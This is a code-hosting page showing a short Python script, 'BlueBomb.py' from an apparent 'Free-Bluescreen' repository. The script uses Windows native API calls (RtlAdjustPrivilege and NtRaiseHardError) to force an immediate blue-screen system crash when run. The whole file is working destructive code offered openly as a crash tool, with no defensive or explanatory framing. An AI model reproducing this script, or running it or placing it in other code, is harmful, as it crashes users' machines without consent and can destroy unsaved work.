Files
Free-Bluescreen/BlueBomb.py

7 lines
229 B
Python
Raw Normal View History

2026-03-30 09:59:30 +11:00
import ctypes
def blue_screen():
ctypes.windll.ntdll.RtlAdjustPrivilege(19, 1, 0, ctypes.byref(ctypes.c_bool()))
ctypes.windll.ntdll.NtRaiseHardError(0xc0000022, 0, 0, 0, 6, ctypes.byref(ctypes.c_ulong()))
blue_screen()